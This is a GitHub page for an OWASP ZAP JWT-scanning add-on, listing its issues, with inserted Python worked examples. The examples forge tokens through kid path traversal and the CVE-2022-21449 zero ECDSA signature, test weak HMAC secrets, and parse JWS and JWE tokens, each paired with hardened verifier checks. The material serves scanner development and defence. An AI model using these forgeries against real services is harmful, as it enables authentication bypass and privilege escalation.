
sasanlabs / owasp-zap-jwt-addon

28.0 5.0 10.0 1.93 MB

OWASP ZAP addon for finding vulnerabilities in JWT Implementations

Home Page: https://www.zaproxy.org/

License: Apache License 2.0

Kotlin 1.24% Java 98.76%
jwt owasp zaproxy zap-extension jwt-scanner fuzzer hacktoberfest scanning security security-tools

owasp-zap-jwt-addon's People

Contributors

karthikuj, keenal, killshotrevival, kingthorin, preetkaran20, thc202


owasp-zap-jwt-addon's Issues

Add support for Java Vuln? (CVE-2022-21449)

Is your feature request related to a problem? Please describe.
It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.

Describe the solution you'd like
Implement a scan rule/check that can detect something similar to:
https://twitter.com/christophetd/status/1516878071785467904

Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)

Describe alternatives you've considered
N/A

Would you like to help fix this issue?
Not at this time.

Additional context
Nothing further.

Static files lead to false positives

Describe the bug
Currently this rule tests static files such as CSS and JS, which leads to false positives.

Expected behavior
Skip the test on static files

Would you like to help fix this issue?
Yes

Adding Header Param Injection attacks

Is your feature request related to a problem? Please describe.
The scan rules present at https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks do not include the header param injections mentioned at https://portswigger.net/web-security/jwt. There are a few other attacks which may also not be present in AttackVectors.

Describe the solution you'd like
Add the attack vectors for the remaining injections as described at https://portswigger.net/web-security/jwt
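Worked example of one of the missing header param injections, the kid path traversal from the PortSwigger material. This is added here by the editor and is not code from the add-on (which is Java); it is Python so the attack and the fix can be run side by side. It forges an HS256 token whose kid points at an empty file, runs it through a hypothetical verifier that resolves kid straight to a file under its key directory, and then through a hardened lookup. The key directory, file names, the 32-byte minimum key length and the use of os.devnull as the traversal target are all assumptions of the example; it expects a POSIX system.

```python
"""Added example: `kid` header parameter injection (path traversal) against an HS256
verifier that maps `kid` to a file in its key directory. The verifier is hypothetical,
not the add-on's code. Assumes POSIX so that os.devnull is an empty readable file."""
import base64
import hashlib
import hmac
import json
import os
import re
import tempfile

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def hs256_token(header: dict, payload: dict, key: bytes) -> str:
    """Compact JWS: b64url(header).b64url(payload).b64url(HMAC-SHA256 over the first two)."""
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode()) for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"

def forge_kid_traversal(payload: dict, key_dir: str) -> str:
    """Attack vector: make `kid` traverse out of the key store to an empty file, then
    sign with the empty key the verifier will read (the ../../dev/null variant)."""
    kid = os.path.relpath(os.devnull, key_dir)  # e.g. ../../../dev/null
    return hs256_token({"alg": "HS256", "typ": "JWT", "kid": kid}, payload, b"")

def _hs256_ok(segments, key: bytes) -> bool:
    h, p, s = segments
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))

def vulnerable_verify(token: str, key_dir: str):
    """Vulnerable: `kid` is joined onto the key directory with no validation at all."""
    segments = token.split(".")
    header = json.loads(b64url_decode(segments[0]))
    with open(os.path.join(key_dir, header["kid"]), "rb") as fh:
        key = fh.read()
    return json.loads(b64url_decode(segments[1])) if _hs256_ok(segments, key) else None

KID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # allow-list: no dots, no path separators

def hardened_verify(token: str, key_dir: str):
    """Hardened: pin the alg, allow-list `kid`, confine the resolved path to key_dir
    and refuse a key too short to be a real HMAC secret (an empty file yields b"")."""
    segments = token.split(".")
    if len(segments) != 3:
        return None
    header = json.loads(b64url_decode(segments[0]))
    kid = header.get("kid")
    if header.get("alg") != "HS256" or not isinstance(kid, str) or not KID_RE.match(kid):
        return None
    root = os.path.realpath(key_dir)
    path = os.path.realpath(os.path.join(root, kid))
    if os.path.commonpath([root, path]) != root or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        key = fh.read()
    if len(key) < 32 or not _hs256_ok(segments, key):
        return None
    return json.loads(b64url_decode(segments[1]))

def demo() -> dict:
    """Constructed scenario: one legitimate 32-byte key in the store, one forged token."""
    claims = {"sub": "admin", "role": "administrator"}
    with tempfile.TemporaryDirectory() as tmp:
        key_dir = os.path.join(os.path.realpath(tmp), "keys")
        os.mkdir(key_dir)
        real_key = os.urandom(32)
        with open(os.path.join(key_dir, "prod-2024"), "wb") as fh:
            fh.write(real_key)
        forged = forge_kid_traversal(claims, key_dir)
        legit = hs256_token({"alg": "HS256", "typ": "JWT", "kid": "prod-2024"}, claims, real_key)
        return {
            "forged_vs_vulnerable": vulnerable_verify(forged, key_dir),  # accepted: the claims
            "forged_vs_hardened": hardened_verify(forged, key_dir),      # None
            "legit_vs_hardened": hardened_verify(legit, key_dir),        # accepted: the claims
        }

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The same forging routine covers the other kid variants on the PortSwigger page (for instance a SQL injection in kid paired with a key the injected query returns): only the kid string and the key used to sign change.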

Add getHelpIndex to Options panel for JWT

Describe the bug
As the options panel for the JWT addon is complex, we should add the help index for the addon so that users can see the help right there and don't need to go to the readme.md in the repository to understand the options panel.

Example of a help index: [image]

Sample code changes
Help Index: https://github.com/SasanLabs/owasp-zap-fileupload-addon/tree/main/src/main/javahelp/org/sasanlabs/fileupload/resources/help

In https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/ui/JWTOptionsPanel.java implement a method:

    @Override
    public String getHelpIndex() {
        return <name>;
    }

Sample PR: https://github.com/SasanLabs/owasp-zap-fileupload-addon/pull/6/files

Glimpse of the UI where the help will be shown: [image]

Testing the changes
Build the addon by running:

  1. ./gradlew spotlessApply
  2. ./gradlew build
    Then in ZAP go to File -> Local addon file -> navigate to project -> build -> bin -> jwt*.zap, and done.

Decoding JWT tokens

This addon should contain the ability to encode/decode JWT tokens found in the request, so that JWT tokens can be tested on the fly.

Create getting started tutorial

I'm new to ZAP and I'm having a problem understanding this plug-in.

Therefore, it would be nice to have a getting started tutorial instead of trying to understand the configuration.

I would love to create the tutorial if it could be included here.

Integrate change log action

Is your feature request related to a problem? Please describe.
Currently I forget to check in/update the change log file and merge the PR, which is not right. So we can integrate an action which will fail a PR if the changelog.md file is not modified.
https://github.com/marketplace/actions/changelog-checker is one GitHub action I found, and I think we can give it a try.
If this checker has some issues then we can write a common function to do the same, as this is a generic problem that many might face.

JWT option in fuzzer is not shown if request doesn't contain a JWT pattern

Is your feature request related to a problem? Please describe.
The JWT option in the fuzzer is not shown if the request doesn't contain a JWT pattern. There is no indication to the user why the JWT option is unavailable.

Glimpse of the issue: [image]

If a JWT pattern is found in the request: [image]

To Reproduce
Go to any request which does not have a JWT pattern and then open the fuzzer screen.

Expected behavior
Document in Readme.md and in the help index (which we are building in PR #25) that the fuzzer will only show the JWT option if the request has a valid JWT format.

Adding support for Elliptic Curve based vulnerabilities

Is your feature request related to a problem? Please describe.
Currently we only handle JWTs signed using HMAC or RSA, but we have not handled JWTs signed with Elliptic Curve algorithms (ES384 etc.).

Describe the solution you'd like

  1. Analyse the vulnerabilities related to EC
  2. Add attack vectors related to them
  3. Add custom payload support for EC-based keys
  4. Add the vulnerable code in https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java so that we can test the attack vectors.
  5. Add a design document regarding the same.

JWT Configurations: [image]

Testing the changes, in case some implementation/PoC is required
Build the addon by running:

  1. ./gradlew spotlessApply
  2. ./gradlew build
    Then in ZAP go to File -> Local addon file -> navigate to project -> build -> bin -> jwt*.zap, and done.
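Worked example covering both the CVE-2022-21449 request earlier on this page and this Elliptic Curve item. It is added by the editor and is not code from the add-on (which is Java); it is written in Python so it runs stand-alone. It builds the forged "psychic signature" token (claims edited, signature set to r = s = 0) that an affected Java ECDSA verifier accepts for any public key, and shows the range check a correct verifier applies before any curve arithmetic. Only the standard library is used, so no real ECDSA verification happens here; the sample token, its dummy signature and the claim override are constructed.

```python
"""Added example (not the add-on's code): the CVE-2022-21449 "psychic signature" vector
for ECDSA-signed JWTs and the verifier-side range check whose absence made affected Java
releases accept it. Standard library only; no real ECDSA verification is performed."""
import base64
import json

# JWS ECDSA signatures are r || s, each zero-padded to the byte length of the curve order
# (RFC 7518 section 3.4), so the all-zero signature is 64, 96 or 132 bytes long.
COORD_BYTES = {"ES256": 32, "ES384": 48, "ES512": 66}

# Group orders n of P-256, P-384 and P-521 (FIPS 186-4 / SEC 2).
CURVE_ORDER = {
    "ES256": 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551,
    "ES384": 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973,
    "ES512": 0x01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFA51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409,
}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def compact(header: dict, payload: dict, signature: bytes) -> str:
    h, p = (b64url(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload))
    return f"{h}.{p}.{b64url(signature)}"

def forge_psychic_token(token: str, claim_overrides: dict) -> str:
    """Attack vector: keep the header, edit the claims, replace the signature with r = s = 0.
    A verifier with the CVE-2022-21449 bug accepts the result for any public key, so a
    scanner compares the response with the one for the untouched token to detect it."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    alg = header.get("alg")
    if alg not in COORD_BYTES:
        raise ValueError(f"not an ECDSA-signed JWS (alg={alg})")
    payload = json.loads(b64url_decode(p))
    payload.update(claim_overrides)
    return compact(header, payload, bytes(2 * COORD_BYTES[alg]))

def ecdsa_signature_in_range(alg: str, signature: bytes) -> bool:
    """Verifier-side pre-check from the ECDSA spec: both r and s must lie in [1, n-1].
    False for the forged token above. The vulnerable code skipped this and continued
    with r = s = 0, where the computation degenerates and the final comparison succeeds."""
    size = COORD_BYTES.get(alg)
    if size is None or len(signature) != 2 * size:
        return False
    r = int.from_bytes(signature[:size], "big")
    s = int.from_bytes(signature[size:], "big")
    n = CURVE_ORDER[alg]
    return 0 < r < n and 0 < s < n

# Constructed sample; a real token would carry a genuine signature in the last segment.
SAMPLE_ES256 = compact({"alg": "ES256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, b"\x11" * 64)

def demo():
    """Returns the forged token and whether a correct verifier's range check passes it."""
    forged = forge_psychic_token(SAMPLE_ES256, {"role": "admin"})
    signature = b64url_decode(forged.split(".")[2])
    return forged, ecdsa_signature_in_range("ES256", signature)  # (..., False)

if __name__ == "__main__":
    token, passes_range_check = demo()
    print(token)
    print("range check passes:", passes_range_check)
```

For a scan rule the useful signal is behavioural: the forged token carries claims the original did not, so an application that answers it the same way it answers the genuine token is accepting an unsigned assertion. ES256K and other non-NIST curves are not covered by the tables above.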

Analysis for other attack vectors on JWT

Is your feature request related to a problem? Please describe.
As the addon was made a year ago, many new JWT-related vulnerabilities might have been introduced since. So we would like to analyse the new attack vectors and how we can incorporate them in the addon.

Describe the solution you'd like
Look at new blogs, bug bounties and other scan rules/add-ons/scanners to find out what we are missing and how we can incorporate it.

Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks

JWT configuration
Go through readme for more information regarding the configuration.

Testing the changes, in case some implementation/PoC is required
Build the addon by running:

  1. ./gradlew spotlessApply
  2. ./gradlew build
    Then in ZAP go to File -> Local addon file -> navigate to project -> build -> bin -> jwt*.zap, and done.

Adding Custom Payload support for weak keys/publicly well known secrets

Is your feature request related to a problem? Please describe.
Scanners cannot include every type of payload in their execution, but in case the user wants custom/additional payloads to be included as part of the scan, we have custom payloads for that requirement.

This is specifically useful for the case where, say, a key is stolen or is only allowed for test environments but due to some bug is used to sign production JWTs; this can help the organization validate that in pen-tests etc.

This was suggested by @kingthorin. For more information visit #11 (comment).

Describe the solution you'd like
Add support for custom payloads where users can add HMAC keys or other well-known keys and check whether their implementation is vulnerable to those payloads.

Code Reference
PR where custom payloads are added: https://github.com/pulls?q=is%3Apr+author%3Akingthorin+archived%3Afalse+custom+payloads+is%3Aclosed

Code where custom payloads/keys can be used in JWT addon: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks/SignatureAttack.java#L96

We might need to enhance it in case we want to add the RSA-based keys.

Testing the changes

Build the addon by running:

  1. ./gradlew spotlessApply
  2. ./gradlew build
    Then in ZAP go to File -> Local addon file -> navigate to project -> build -> bin -> jwt*.zap, and done.
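Worked example of the custom payload check described in this issue, added by the editor and not taken from the add-on (which is Java; this is Python so it runs stand-alone). An HS256/HS384/HS512 token is re-signed with each candidate secret, taken from a built-in list of publicly known defaults plus a user-supplied one-secret-per-line file, and the matching secret is reported. The secrets, tokens and payload file are constructed for the example; the RSA case mentioned above is not covered.

```python
"""Added example (not the add-on's code): test an HMAC-signed JWT against well-known
secrets plus organisation-supplied custom payloads. All secrets and tokens are
constructed for the example."""
import base64
import hashlib
import hmac
import json
import os

HMAC_DIGEST = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def hs_sign(signing_input: bytes, alg: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input, HMAC_DIGEST[alg]).digest()

def make_hs_token(payload: dict, alg: str, key: bytes) -> str:
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    return f"{header}.{body}.{b64url(hs_sign(signing_input, alg, key))}"

def find_weak_secret(token: str, candidates):
    """Return the first candidate that reproduces the token's HMAC, else None.
    Only HS* algs are tried: a token with a non-HMAC alg is not re-signed with a shared
    secret here, which keeps this check separate from algorithm-confusion attacks."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg not in HMAC_DIGEST:
        return None
    signing_input = f"{h}.{p}".encode()
    given = b64url_decode(s)
    for cand in candidates:
        key = cand.encode("utf-8") if isinstance(cand, str) else cand
        if hmac.compare_digest(hs_sign(signing_input, alg, key), given):
            return key
    return None

def load_custom_payloads(text: str):
    """Parse a user-supplied secret list: one secret per line, blank lines and '#'
    comments skipped, only the line terminator removed (secrets may contain spaces)."""
    secrets = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        secrets.append(line.encode("utf-8"))
    return secrets

# Publicly well-known defaults (the jwt.io example secret among them).
BUILTIN_SECRETS = [b"secret", b"password", b"changeme", b"your-256-bit-secret", b"jwt_secret"]

# Constructed custom payload file: keys that are only meant for test environments.
CUSTOM_PAYLOADS = (
    "# test-env signing keys that must never sign production tokens\n"
    "staging-hmac-2023\n"
    "qa-shared-key\n"
)

def demo():
    """A token signed with a leaked test-env key is caught; a random 32-byte key is not."""
    candidates = BUILTIN_SECRETS + load_custom_payloads(CUSTOM_PAYLOADS)
    leaked = make_hs_token({"sub": "alice", "env": "prod"}, "HS512", b"staging-hmac-2023")
    strong = make_hs_token({"sub": "alice", "env": "prod"}, "HS256", os.urandom(32))
    return find_weak_secret(leaked, candidates), find_weak_secret(strong, candidates)

if __name__ == "__main__":
    print(demo())  # (b'staging-hmac-2023', None)
```

Because the comparison is against the signature the server actually produced, a hit is conclusive: the server holds that secret, whatever it was meant for.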

Inconsistency in Truststore and Private key inputs

This issue is to track the inconsistency between the truststore input and the private key input.
The truststore takes input in PKCS12 format whereas the private key input is a PEM file.
The truststore input requires a password whereas the private key input does.

In case users are facing trouble with this, please add a comment or a thumbs up so that we can prioritise this issue.

thanks,
Karan

Adding Attack vector for finding vulnerabilities related to JWE

Is your feature request related to a problem? Please describe.

We currently only handle JWS and have not handled JWE, so under this enhancement we are looking to add:

  1. Analyse vulnerabilities related to JWE by going through various blogs, bug bounties and other scanner add-ons
  2. Implement the attack vectors
  3. Add the vulnerable code in https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java so that we can test the attack vectors.
  4. Add a design document regarding the same.

Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
Adding support for parsing JWE: public static boolean isTokenValid(String jwtToken)

Fuzzer code: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/fuzzer/ui/JWTFuzzPanelView.java
Scan Rule code: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/JWTActiveScanRule.java

Testing the changes
Build the addon by running:

  1. ./gradlew spotlessApply
  2. ./gradlew build
    Then in ZAP go to File -> Local addon file -> navigate to project -> build -> bin -> jwt*.zap, and done.
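Worked example serving this JWE item and the earlier items about decoding JWT tokens found in a request and about showing the fuzzer's JWT option only when the request carries a valid JWT pattern. It is added by the editor and is not code from the add-on (which is Java; this is Python so it runs stand-alone). It pulls JOSE compact serializations out of raw request text, tells JWS (3 segments) from JWE (5 segments), decodes the protected header, and surfaces header-only risk flags. The sample request, the token bytes in it and the flag wording are constructed.

```python
"""Added example (not the add-on's code): find JOSE compact tokens in raw request text
and decode their protected headers, telling JWS (3 segments) from JWE (5 segments)."""
import base64
import json
import re

# 3 or 5 dot-separated base64url segments. The 2nd and 3rd may be empty: a JWE using
# `alg:dir` or ECDH-ES has an empty encrypted-key segment and a JWS with `alg:none` has
# an empty signature. The look-arounds keep us from matching inside a longer run.
SEG = r"[A-Za-z0-9_-]"
JOSE_RE = re.compile(
    rf"(?<![A-Za-z0-9_.-]){SEG}+\.{SEG}*\.{SEG}*(?:\.{SEG}+\.{SEG}+)?(?![A-Za-z0-9_-])"
)

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def parse_jose(candidate: str):
    """Describe a candidate, or return None when its first segment is not a JSON header
    carrying `alg`. That check, not the regex, is what rejects look-alikes such as the
    asset name app.1.2.3.min.js."""
    parts = candidate.split(".")
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:  # bad base64url, non-UTF-8 bytes and non-JSON all raise ValueError
        return None
    if not isinstance(header, dict) or "alg" not in header:
        return None
    if len(parts) == 3:
        try:
            payload = json.loads(b64url_decode(parts[1]))
        except ValueError:
            payload = None  # non-JSON or nested payload; still a JWS
        return {"kind": "JWS", "header": header, "payload": payload,
                "signature_empty": parts[2] == "", "token": candidate}
    if len(parts) == 5 and "enc" in header:
        return {"kind": "JWE", "header": header, "token": candidate}
    return None

def find_tokens(text: str) -> list:
    return [t for t in (parse_jose(m.group(0)) for m in JOSE_RE.finditer(text)) if t]

def risk_flags(info: dict) -> list:
    """Header-only observations worth reporting before any active payload is sent."""
    header = info["header"]
    alg = str(header.get("alg", ""))
    flags = []
    if alg.lower() == "none":
        flags.append("alg=none: unsigned JWS")
    elif info["kind"] == "JWS" and info["signature_empty"]:
        flags.append(f"empty signature with alg={alg}")
    if info["kind"] == "JWE" and alg == "RSA1_5":
        flags.append("RSA1_5: PKCS#1 v1.5 key wrapping, only Recommended- in RFC 7518")
    for name in ("jku", "x5u", "jwk", "kid"):
        if name in header:
            flags.append(f"{name} header present: key selection is attacker-influenced")
    return flags

def _tok(*segments) -> str:
    """Build a compact token: dicts are JSON-encoded, bytes are used as raw segments."""
    return ".".join(
        b64url(json.dumps(s, separators=(",", ":")).encode()) if isinstance(s, dict) else b64url(s)
        for s in segments
    )

# Constructed request. Signature and ciphertext bytes are dummies; the asset path is
# the kind of dotted string a naive regex would report as a token.
SAMPLE_REQUEST = (
    "GET /static/app.1.2.3.min.js HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Authorization: Bearer "
    + _tok({"alg": "HS256", "typ": "JWT", "kid": "k1"}, {"sub": "alice"}, b"\x01" * 32)
    + "\r\nCookie: session="
    + _tok({"alg": "RSA1_5", "enc": "A128CBC-HS256"}, b"\x02" * 256, b"\x03" * 16, b"\x04" * 48, b"\x05" * 16)
    + "; theme=dark\r\nX-Legacy-Token: "
    + _tok({"alg": "none"}, {"sub": "bob"}, b"")
    + "\r\n\r\n"
)

def demo() -> list:
    return [(t["kind"], t["header"]["alg"], risk_flags(t)) for t in find_tokens(SAMPLE_REQUEST)]

if __name__ == "__main__":
    for kind, alg, flags in demo():
        print(kind, alg, flags)
```

A JWE cannot be attacked the way a JWS can: there is no signature to strip or re-key, so the useful checks are on the protected header (the key-management alg, the `enc` algorithm, and any jku/x5u/jwk/kid the server might dereference), which is why the parser stops at the header for five-segment tokens.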
